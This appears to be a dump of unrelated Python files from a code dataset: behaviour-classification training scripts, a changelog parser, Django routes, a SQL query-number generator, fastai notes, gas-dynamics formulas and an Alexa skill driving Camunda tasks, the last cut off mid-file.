+{"seq_id":"354883280","text":"# -*- coding: utf-8 -*-\n\"\"\" Binary behavior classification split2\n\"\"\"\n\n__author__ = 'Knut-Henning Kofoed'\n__email__ = 'knut-henning@hotmail.com'\n\n\nimport preprocessing_package as pp\nimport visualize_package as vp\nimport machinelearn_package as mlp\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\n\n\n#%% Data prepro\n# Import activity observations\nact = pp.import_activity('behavior\\\\behaviors.csv')\n\n# Correct time to UTC\nact_35396 = act[act['Nofence ID'] == 35396]\nact_37368 = act[act['Nofence ID'] == 37368]\nact_35396 = pp.offset_time(act_35396, column='Tid', hour=-2, finetune=True, second=19)\nact_37368 = pp.offset_time(act_37368, column='Tid', hour=-2, finetune=False, second=0)\nact = pd.concat([act_35396, act_37368])\n\n# Connect activity observations with accelerometerdata\nserials = pp.unique_serials(act)\nstart_stop = pp.activity_time_interval(act)\nacc = pp.import_aks(serials, start_stop)\nacc_act = pp.connect_data(act, acc)\n\n# Visualize\nvp.show_timestep_freq(pp.select_serial(acc_act, serials[0]))\nvp.show_serial_dist(acc_act)\nvp.plot_acc(acc_act, serials)\nvp.plot_acc(acc_act, serials, plot_all=False)\n\n\n#%% Machinelearning preprocessing\n# Change behaviors so that it is binary\nmlp.replace_class(acc_act, {2: 1, 3: 1})\n\n# Data splitting\natt = ['xcal', 'ycal', 'zcal', 'norm']\nclasses = ['Hviler', 'Bevegelse']\nX_train, y_train, X_val, y_val, X_test, y_test = mlp.create_ser_train_test(acc_act,\n serials[1],\n serials[0],\n 'test',\n 0.5,\n 'right',\n att)\n\nvp.plot_classbal_trainsplit(y_train, y_val, y_test, classes, show_title=True)\n\n#%% GRU hyper param tuning multi-classification\ngru_config_dict = {\"scaler\": ['standardscaler'],\n \"time_steps\": [32, 64, 96],\n \"step\": [15, 31, 62],\n \"conv1d_filters\": [10, 20, 50, 100],\n \"gru_units\": [16, 32, 64, 96],\n \"learn_rate\": [0.001],\n \"epochs\": [100],\n \"batch_size\": [32, 64, 128]\n }\n\nmlp.create_hyp_report(\n X_train, y_train, \n X_val, y_val, \n X_test, y_test, \n 'gru', gru_config_dict,\n att, 'binary', 'split2', show_epochs=True\n )\n\n\n#%% Best params for GRU\n# Reload model and data\nbinary_gru_losses = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\val_losses.npy')\n\nbinary_gru_report = []\n\nfor i, model in enumerate(binary_gru_losses):\n binary_gru_model = keras.models.load_model('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}'.format(i))\n binary_gru_X_test = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}_Xtest.npy'.format(i))\n binary_gru_y_test = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}_ytest.npy'.format(i))\n\n # Model summary\n binary_gru_model.summary()\n \n # Evaluate and plot confusion matrix\n binary_gru_model.evaluate(binary_gru_X_test, binary_gru_y_test)\n\n y_test_n = np.argmax(binary_gru_y_test, axis=1) # Convert from onehot back to normal labels\n y_pred_n = np.argmax(binary_gru_model.predict(binary_gru_X_test), axis=-1)\n vp.plot_matrix(y_test_n, y_pred_n, classes, 'GRU', 'binary', show_title=False)\n binary_gru_report.append(vp.plot_pandas_classification_report(y_test_n, y_pred_n))\n\n\n\n#%% LSTM multi-classification\nlstm_config_dict = {\"scaler\": ['standardscaler'],\n \"time_steps\": [32, 64, 96],\n \"step\": [15, 31, 62],\n \"lstm_units\": [64, 96, 128],\n \"dropout\": [0, 0.2],\n \"dense_units\": [6, 10],\n \"learn_rate\": [0.001],\n \"epochs\": [100],\n \"batch_size\": [32, 64, 128]\n }\n\nmlp.create_hyp_report(\n X_train, y_train, \n X_val, y_val, \n X_test, y_test, \n 'lstm', lstm_config_dict, \n att, 'binary', 'split2', show_epochs=True\n )\n\n\n#%% Best params for LSTM\n# Reload model and data\nbinary_lstm_losses = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\val_losses.npy')\n\nbinary_lstm_report = []\n\nfor i, model in enumerate(binary_lstm_losses):\n binary_lstm_model = keras.models.load_model('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}'.format(i))\n binary_lstm_X_test = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}_Xtest.npy'.format(i))\n binary_lstm_y_test = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}_ytest.npy'.format(i))\n\n # Model summary\n binary_lstm_model.summary()\n \n # Evaluate and plot confusion matrix\n binary_lstm_model.evaluate(binary_lstm_X_test, binary_lstm_y_test)\n\n y_test_n = np.argmax(binary_lstm_y_test, axis=1) # Convert from onehot back to normal labels\n y_pred_n = np.argmax(binary_lstm_model.predict(binary_lstm_X_test), axis=-1)\n vp.plot_matrix(y_test_n, y_pred_n, classes, 'LSTM', 'binary', show_title=False)\n binary_lstm_report.append(vp.plot_pandas_classification_report(y_test_n, y_pred_n))\n\n","sub_path":"binary_behavior_split2.py","file_name":"binary_behavior_split2.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"128191555","text":"from typing import Dict, Iterable, Iterator, Type, TypeVar\n\nfrom newversion import Version\n\nfrom logchange.constants import MAJOR_SECTION_TITLES, MINOR_SECTION_TITLES, SECTION_TITLES\nfrom logchange.record_section import RecordSection\nfrom logchange.utils import dedent\n\n_R = TypeVar(\"_R\", bound=\"RecordBody\")\n\n\nclass RecordBody:\n \"\"\"\n Keep a changelog release body.\n \"\"\"\n\n PARTS_DELIM = \"\\n\\n\"\n\n def __init__(\n self,\n sections: Iterable[RecordSection] = (),\n prefix: str = \"\",\n postfix: str = \"\",\n ) -> None:\n self._sections: Dict[str, RecordSection] = {i: RecordSection(i, \"\") for i in SECTION_TITLES}\n self.prefix: str = prefix\n self.postfix: str = postfix\n for section in sections:\n self.append_lines(section.title, section.body)\n\n @property\n def sections(self) -> Iterator[RecordSection]:\n \"\"\"\n Iterate over non-empty sections.\n\n Yields:\n RecordSection.\n \"\"\"\n for section in self._sections.values():\n if section.is_empty():\n continue\n yield section\n\n def bump_version(self, old_version: Version) -> Version:\n \"\"\"\n Bump version based on present changelog sections.\n \"\"\"\n section_titles = {i.title for i in self.sections}\n if section_titles & MAJOR_SECTION_TITLES:\n return old_version.bump_major()\n if section_titles & MINOR_SECTION_TITLES:\n return old_version.bump_minor()\n\n return old_version.bump_micro()\n\n def bump_rc_version(self, old_version: Version) -> Version:\n \"\"\"\n Bump ReleaseCandidate version.\n \"\"\"\n new_version = self.bump_version(old_version)\n if old_version.get_stable() == new_version:\n return old_version.bump_prerelease()\n\n return new_version.replace(rc=1)\n\n def get_section(self, title: str) -> RecordSection:\n \"\"\"\n Get section by `title`.\n\n Arguments:\n title -- Section title.\n\n Returns:\n Found Record Section.\n \"\"\"\n title = title.lower()\n if title not in self._sections:\n raise ValueError(f\"Invalid section title: {title}\")\n\n return self._sections[title.lower()]\n\n def render(self) -> str:\n \"\"\"\n Render to string.\n \"\"\"\n parts = []\n\n if self.prefix:\n parts.append(self.prefix)\n\n for section_title in SECTION_TITLES:\n section = self.get_section(section_title)\n if section.is_empty():\n continue\n parts.append(section.render())\n\n if self.postfix:\n parts.append(self.postfix)\n\n parts = [i for i in parts if i]\n return self.PARTS_DELIM.join(parts)\n\n def set_section(self, title: str, body: str) -> None:\n \"\"\"\n Change section `title` text content to `body`.\n \"\"\"\n self.get_section(title).body = body\n\n def append_lines(self, title: str, text: str) -> None:\n \"\"\"\n Append text after new line to `title` section.\n\n Arguments:\n title -- Section title.\n text -- Text to append.\n \"\"\"\n self.get_section(title).append_lines(text)\n\n def append_to_all(self, text: str) -> None:\n \"\"\"\n Append `text` to all non-empty sections.\n \"\"\"\n for section in self.sections:\n section.append(text)\n\n def get_merged(self: _R, other: _R) -> _R:\n \"\"\"\n Create a new body from current and `other`.\n\n Arguments:\n other -- Other record body.\n\n Returns:\n New RecordBody.\n \"\"\"\n result = self.__class__()\n for section_title in SECTION_TITLES:\n old_section = self.get_section(section_title)\n new_section = other.get_section(section_title)\n result.append_lines(section_title, old_section.body)\n result.append_lines(section_title, new_section.body)\n\n return result\n\n @staticmethod\n def _parse_prefix_section(line: str) -> str:\n if \":\" not in line:\n return \"\"\n\n line_lower = line.lower()\n for section_title in SECTION_TITLES:\n if line_lower.startswith(f\"{section_title}:\"):\n return section_title\n\n return \"\"\n\n @staticmethod\n def _parse_header_title(line: str) -> str:\n if line.startswith(\"#\") and \" \" in line:\n title = line.split()[1].lower()\n if title in SECTION_TITLES:\n return title\n return \"\"\n\n @staticmethod\n def _has_header(line: str) -> bool:\n return line.startswith(\"#\") and \" \" in line\n\n @classmethod\n def parse(cls: Type[_R], text: str) -> _R:\n \"\"\"\n Parse RecordBoyd from `text`.\n \"\"\"\n text = dedent(text)\n title = \"\"\n prefix_lines = []\n postfix_lines = []\n codeblock = False\n result = cls()\n for line in text.splitlines():\n if line.startswith(\"```\"):\n codeblock = not codeblock\n if not codeblock:\n if cls._has_header(line):\n title = cls._parse_header_title(line)\n if title:\n continue\n\n prefix_title = cls._parse_prefix_section(line)\n if prefix_title:\n result.append_lines(prefix_title, line[len(prefix_title) + 1 :].strip())\n continue\n\n if title:\n result.append_lines(title, line)\n else:\n if result.is_empty():\n prefix_lines.append(line)\n else:\n postfix_lines.append(line)\n\n result.prefix = dedent(\"\\n\".join(prefix_lines))\n result.postfix = dedent(\"\\n\".join(postfix_lines))\n return result\n\n def is_empty(self) -> bool:\n \"\"\"\n Whether body has no text.\n \"\"\"\n if self.prefix or self.postfix:\n return False\n\n for _ in self.sections:\n return False\n\n return True\n\n def sanitize(self) -> None:\n \"\"\"\n Remove prefix and postfix.\n \"\"\"\n self.prefix = \"\"\n self.postfix = \"\"\n\n def __copy__(self: _R) -> _R:\n return self.__class__(\n prefix=self.prefix, postfix=self.postfix, sections=(i for i in self.sections)\n )\n\n def clone(self: _R) -> _R:\n \"\"\"\n Get a copy of record body.\n \"\"\"\n return self.__copy__()\n\n def clear(self) -> None:\n \"\"\"\n Remove all text from record body.\n \"\"\"\n self.sanitize()\n for section in self.sections:\n section.body = \"\"\n","sub_path":"logchange/record_body.py","file_name":"record_body.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"344337224","text":"from django.urls import path\nfrom . import views\n\napp_name=\"issueaccount\"\n\nurlpatterns = [\n path('entrance/', views.entrance.as_view(), name='entrance'),\n path('get_datasource/', views.get_datasource.as_view(), name='get_datasource'),\n path('edit/', views.edit.as_view(), name='edit'),\n path('insert/', views.insert.as_view(), name='insert'),\n path('get_originbill_datasource/', views.get_originbill_datasource.as_view(), name='get_originbill_datasource'),\n path('get_material_datasource/', views.get_material_datasource.as_view(), name='get_material_datasource'),\n path('recevoid/', views.recevoid.as_view(), name='recevoid')\n]","sub_path":"issueaccount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"448927620","text":"import datetime\n# from config import db_cursor as cursor, db_conn as conn\nfrom exceptions.dao_exceptions import DaoExceptionError\nimport psycopg2\n\ndef create_query(cursor):\n try:\n today = (datetime.date.today())\n year = today.year\n month = today.month\n day = today.day\n query_date_data = {\"year\": year, \"month\": month, \"day\": day}\n query_number = ''' select * from query_number where day={} limit 1; '''\n cursor.execute(query_number.format(day))\n row = cursor.fetchone()\n if not row:\n new_query = '''insert into query_number (query, month, year, day) values({query}, {month}, {year}, {day});'''\n query_date_data['query'] = 1\n cursor.execute(new_query.format(**query_date_data))\n # cursor.close()\n query_id = str(day).zfill(2) + str(month).zfill(2) + str(year) + str(1).zfill(4)\n return query_id\n\n if row['year'] != year or row['month'] != month or row['day'] != day:\n query = 1\n else:\n query = row['query']+1\n \n update_query = ''' update query_number set query={query}, month={month}, year={year}, day={day} where id = {row_id};'''\n\n query_date_data['query'] = query\n query_date_data['row_id'] = row['id']\n\n cursor.execute(update_query.format(**query_date_data))\n \n # cursor.close()\n query_id = str(day).zfill(2) + str(month).zfill(2) + str(year) + str(query).zfill(4)\n # 100/0\n return query_id\n \n except Exception as e:\n # conn.rollback()\n raise DaoExceptionError(status_code=400, message=\"error in query number genration\")\n\n","sub_path":"utils/query_number_generator.py","file_name":"query_number_generator.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"453725694","text":"from local.test import *\nfrom local.imports import *\nfrom local.notebook.showdoc import show_doc\nfrom local.core import *\nfrom local.core import _listify\n\n####################\n#### run this block to rewrite class L from scratch\n# class L(GetAttr, metaclass=NewChkMeta):\n# \"Behaves like a list of `items` but can also index with list of indices or masks\"\n# _xtra = [o for o in dir(list) if not o.startswith('_')]\n####################\n\nshow_doc(L)\n\n@patch\ndef L_doc(cls:L):\n \"\"\"\n why need `L`?\n - although with `_listify`, we can make everything a list\n - but don't we always wish for more features to work on a list of things?\n - why don't we add more flexibilities and functionalities beyond 'list'\n\n What new features `NewChkMeta` offer us with `L`?\n - create a new L object from values `items`\n - if `items` is instance of `L`, return the instance\n\n What new features `GetAttr` offer to `L`?\n - inherit from `GetAttr`, `L` can borrow others' methods\n - it actually can borrow all methods from `list` with `_xtra`\n \"\"\"\n\nshow_doc(L.L_doc)\n\n@patch\ndef __init__(cls:L, items=None, *rest, use_list=False, match=None):\n \"\"\"\n why need `L`?\n - although with `_listify`, we can make everything a list\n - but don't we always wish for more features to work on a list of things?\n - why don't we add more flexibilities and functionalities beyond 'list'\n\n What new features `NewChkMeta` offer us with `L`?\n - create a new L object from values `items`\n - if `items` is instance of `L`, return the instance\n\n What new features `GetAttr` offer to `L`?\n - inherit from `GetAttr`, `L` can borrow others' methods\n - it actually can borrow all methods from `list` with `_xtra`\n\n #####################\n why need __init__?\n - obviously, we need a way to create such a L thing\n\n how to use __init__?\n - `L(None)`\n - `L(1,2,3)`\n - `L((1,2,3))`\n - `L(array(1,2,3))`\n - `L(tensor(1,2,3))`\n - `L(range(5, 10))`\n - `L(4, match=[1,2,3])`\n - `L(tensor(1,2,3), use_list=True)`\n - `L(...)` does not return anything, only manages items\n\n how does __init__ work?\n - first, we deal with `items` as None, turn it `[]`\n - then, we make `items` a list by `_listify(items)`\n - we can make `items` a strange list by `list(items)`\n - toggled by `use_list = True`\n - a single array or tensor break down into pieces\n - then we add flexibility to do `L.__init__(1,2,3)`\n - using `cls.items += list(rest)`,\n - just like we did in `core.tensor`\n - we can duplicate `items` `len(match)` times\n \"\"\"\n items = [] if items is None else items\n cls.items = cls.default = list(items) if use_list else _listify(items)\n cls.items += list(rest)\n if match is not None:\n if len(cls.items)==1: cls.items = cls.items*len(match)\n else: assert len(cls.items)==len(match), 'Match length mismatch'\n\nshow_doc(L.__init__)\nL(None)\nL(1,2,3)\nL((1,2,3))\nL([1,2,3], ['a', 'b', 'c']) # watch out!\nL(array([1,2,3]))\nL(tensor(1,2,3))\nL(range(5, 10))\nL(4, match=[1,2,3])\nL(tensor(1,2,3), use_list=True)\nmap(str, L(1,2,3))\nmap(str, L(1,2,3).items)\nL(1,2,3).__dir__()\n","sub_path":"my_workstation/my-v2/core.L.__init__.py","file_name":"core.L.__init__.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"313379136","text":"import numpy as np \nfrom copy import copy\n#### GASDYNAMICS V1.0\n\n# VARIABLE NOMENCLATURE:\n#\t- M: mach number\n#\t- nu: prandtl-meyer function\n#\t- T: temperature\n#\t- p: pressure\n#\t- rho: density\n\n# EXPLICIT RELATIONS ##########################################\n\n# Supersonic flow\ndef mach_angle(M,degrees=0):\n\t# computes mach angle (M > 1)\n\tmu = np.arcsin(1/M)\n\tif (degrees):\n\t\treturn mu*180/np.pi\n\telse:\n\t\treturn mu\n\ndef prandtl_meyer(M,gamma,degrees=0):\n\t# computes prandtl-meyer function (M > 1)\n\tnu = np.sqrt((gamma+1)/(gamma-1))*np.arctan(np.sqrt((gamma-1)/(gamma+1)*(M**2-1))) - np.arctan(np.sqrt(M**2-1))\n\tif (degrees):\n\t\treturn nu*180/np.pi \n\telse:\n\t\treturn nu\n\n# Isentropic flow\ndef isentropic_ratios(M_1,M_2,gamma):\n\t# computes isentropic flow ratio between two points in flow (T_2/T_1, p_2/p_1, rho_2/rho_1)\n\tT_ratio = (1+(gamma-1)/2*M_1**2)/(1+(gamma-1)/2*M_2**2)\n\tp_ratio = T_ratio**(gamma/(gamma-1))\n\trho_ratio = T_ratio**(1/(gamma-1))\t\n\ta_ratio = np.sqrt(T_ratio)\n\treturn T_ratio,p_ratio,rho_ratio,a_ratio\n\ndef expansion_ratio(M_1,M_2,gamma):\n\t# returns area of expansion ratio A_2/A_1\n\treturn M_1/M_2*((2+(gamma-1)*M_2**2)/(2+(gamma-1)*M_1**2))**((gamma+1)/(2*(gamma-1)))\n\n# Important rocket relations\ndef PR_expansion_mach(PR,gamma):\n\t# returns mach number given pressure ratio\n\treturn np.sqrt(((PR)**((gamma-1)/gamma)-1)*2/(gamma-1))\n\n# IMPLICIT RELATIONS ##########################################\ndef prandtl_meyer_zero(M,nu,gamma):\n\treturn np.sqrt((gamma+1)/(gamma-1))*np.arctan(np.sqrt((gamma-1)/(gamma+1)*(M**2-1))) - np.arctan(np.sqrt(M**2-1)) - nu\n\ndef expansion_ratio_zero(M_1,M_2,gamma,epsilon):\n\treturn M_1/M_2*((2+(gamma-1)*M_2**2)/(2+(gamma-1)*M_1**2))**((gamma+1)/(2*(gamma-1))) - epsilon\n\ndef mach_angle_velocity_ratio(mu,W,gamma):\n\treturn np.sin(mu) - np.sqrt((gamma-1)/2*(1/W**2-1))\n\n# STANDARD ATMOSPHERE #########################################\n# constants declaration\n\n\ndef standard_atmosphere(altitude):\n\t# 1976 US Standard Atmosphere\n\n\tps = 101325\n\trhos = 1.225\n\tTs = 288.15\n\n\tR = 287.0531\n\tg_0 = 9.80665\n\ta = -6.5/1000\n\tearth_radius = 6.356766*10**6\n\taltitude = copy(altitude)\n\tp_atm_range = copy(altitude)\n\tT_atm_range = copy(altitude)\n\trho_atm_range = copy(altitude)\n\tfor i in range(len(altitude)):\n\t\th = earth_radius/(earth_radius + altitude[i])*altitude[i] #geopotential alt.\n\t\t#h = 20000\n\n\t\tif (h<=11000):\n\t\t# gradient (troposphere) region\n\t\t\tT_atm = Ts + a*h;\n\t\t\tp_atm = ps*(T_atm/Ts)**-(g_0/(a*R))\n\t\t\trho_atm = rhos*(T_atm/Ts)**-(1+g_0/(a*R))\n\t\telse:\n\t\t# contant temperature (stratosphere)region ~20000m (65616.8ft), should check\n\t\t\t# values at boundary\n\t\t\tT_atm = Ts + a*11000\n\t\t\tp1 = ps*(T_atm/Ts)**(-g_0/(a*R))\n\t\t\trho1 = rhos*(T_atm/Ts)**-(1+g_0/(a*R))\n\n\t\t\t# values at elevation\n\t\t\tp_atm = p1*np.exp(-g_0/(R*T_atm)*(h-11000))\n\t\t\trho_atm = rho1*np.exp(-g_0/(R*T_atm)*(h-11000))\n\t\tp_atm_range[i] = p_atm\n\t\tT_atm_range[i] = T_atm \n\t\trho_atm_range[i] = rho_atm \n\n\tif len(altitude) > 1:\n\t\treturn (p_atm_range,T_atm_range,rho_atm_range)\n\telse:\n\t\treturn (p_atm,T_atm,rho_atm)","sub_path":"angelinoNozzle_py/gasdynamics.py","file_name":"gasdynamics.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"421090882","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport ask_sdk_core.utils as ask_utils\nimport requests\n\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nfrom ask_sdk_model.dialog import ElicitSlotDirective, ConfirmIntentDirective, ConfirmSlotDirective\nfrom ask_sdk_model import (\n Intent, IntentConfirmationStatus, Slot, SlotConfirmationStatus)\nfrom ask_sdk_model.dialog_state import DialogState\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\ncamunda_url = \"https://dcd56278b9d2.ngrok.io\"\ncurrent_user = \"anna\"\ncurrent_group = \"service\"\ncurrent_task = None\n\n\ndef get_current_task(assignee):\n \"\"\"Holt alle Aufgaben, die dem assignee zugewiesen sind.\n Sind keine da oder geht etwas schief, wird der aktuelle Task auf NONE gesetzt.\"\"\"\n global current_task\n try:\n current_task = None\n alle_meine_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?assignee={assignee}&sortBy=created&sortOrder=asc\")\n if alle_meine_tasks_request.status_code == 200:\n alle_meine_tasks = alle_meine_tasks_request.json()\n if len(alle_meine_tasks) != 0:\n current_task = alle_meine_tasks[0]\n except:\n logger.info(\"get_current_task(assignee): request failed\")\n\n\ndef claim_new_task(candidateGroup, assignee):\n \"\"\"Die älteste, verfügbare Aufgabe der candidateGroup wird dem assignee zugewiesen.\"\"\"\n try:\n alle_service_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?candidateGroup={candidateGroup}&unassigned=true&sortBy=created&sortOrder=asc\")\n if alle_service_tasks_request.status_code == 200:\n alle_service_tasks = alle_service_tasks_request.json()\n if len(alle_service_tasks) > 0:\n oldest_task_id = alle_service_tasks[0]['id']\n requests.post(\n f\"{camunda_url}/rest/task/{oldest_task_id}/assignee\", json={\"userId\": assignee})\n get_current_task(assignee)\n except:\n logger.info(\"claim_new_Task(candidateGroup, assignee): request failed\")\n\n\ndef complete_task_failed(handler_input):\n \"\"\"Wenn das Abschließen einer Aufgabe fehlschlägt\"\"\"\n return (\n handler_input.response_builder\n .speak(\"ich konnte deine aufgabe leider nicht abschließen.\")\n .set_should_end_session(False)\n .response\n )\n\n\ndef no_task_assigned(handler_input):\n \"\"\"Wenn dem Nutzer noch keine Aufgabe zugewiesen ist, er aber mit ihr interagieren möchte\"\"\"\n return (\n handler_input.response_builder\n .speak(\"frage mich zuerst, was deine aufgabe ist.\")\n .set_should_end_session(False)\n .response\n )\n\n\ndef no_or_new_task():\n \"\"\"Standard Prozedur nach dem Abschließen einer Aufgabe\"\"\"\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group, assignee=current_user)\n\n if current_task is None:\n return \"ich habe deine aufgabe abgeschlossen. aktuell gibt es keine weiteren verfügbaren aufgaben.\"\n else:\n return f\"ich habe deine aufgabe abgeschlossen. deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\"\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler für den Start des Skills. Wird bei jedem Start des Skills aufgerufen.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n speak_output = f\"hallo {current_user}! ich bin dein virtueller assistent und helfe dir mit allem rund um deine aufgaben. was möchtest du tun?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass AufgabeDetailsIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Aufgabendetails. Gibt, wenn vorhanden, die Details zur Aufgabe zurück\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeDetailsIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group, assignee=current_user)\n\n if current_task is None:\n speak_output = \"aktuell gibt es keine verfügbaren aufgaben.\"\n else:\n speak_output = f\"deine aufgabe ist: {current_task['name']}. {current_task['description']}\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Generischer Abschluss\nclass AufgabeAbschlussIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Abschluss von Aufgaben. Generischer Abschluss von Aufgaben hier möglich. \n Jeder Aufgabentyp des Prozesses kann hiermit abgeschlossen werden.\n Angepasste Logik für den Abschluss von \"zahlungsart bestimmen\".\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeAbschlussIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] != \"bestellung servieren\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n except:\n return complete_task_failed(handler_input)\n else:\n slot_confirmation_status = handler_input.request_envelope.to_dict(\n )['request']['intent']['slots']['direkt']['confirmation_status']\n if slot_confirmation_status == \"NONE\":\n speak_output = \"hat der gast direkt bezahlt?\"\n directive = ConfirmSlotDirective(\n updated_intent=Intent(\n name=\"AufgabeAbschlussIntent\",\n slots={\n \"direkt\": Slot(\n name=\"direkt\",\n value=\"true\")\n }),\n slot_to_confirm=\"direkt\")\n return (\n handler_input.response_builder\n .add_directive(directive)\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n else:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n if slot_confirmation_status == \"DENIED\":\n request_body['variables']['direkt']['value'] = \"false\"\n\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n except:\n return complete_task_failed(handler_input)\n\n speak_output = no_or_new_task()\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass WagenVorbereitenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"service-wagen vorbereiten\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"WagenVorbereitenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"service-wagen vorbereiten\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ServierenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"bestellung servieren\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ServierenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n slot_confirmation_status = handler_input.request_envelope.to_dict(\n )['request']['intent']['slots']['direkt']['confirmation_status']\n if slot_confirmation_status == \"NONE\":\n speak_output = \"hat der gast direkt bezahlt?\"\n directive = ConfirmSlotDirective(\n updated_intent=Intent(\n name=\"AufgabeAbschlussIntent\",\n slots={\n \"direkt\": Slot(\n name=\"direkt\",\n value=\"true\")\n }),\n slot_to_confirm=\"direkt\")\n return (\n handler_input.response_builder\n .add_directive(directive)\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n else:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n if slot_confirmation_status == \"DENIED\":\n request_body['variables']['direkt']['value'] = \"false\"\n\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n \n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ZahlungSofortIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe \"zahlungsart bestimmen\", Gast zahlt sofort.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ZahlungSofortIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n try:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n 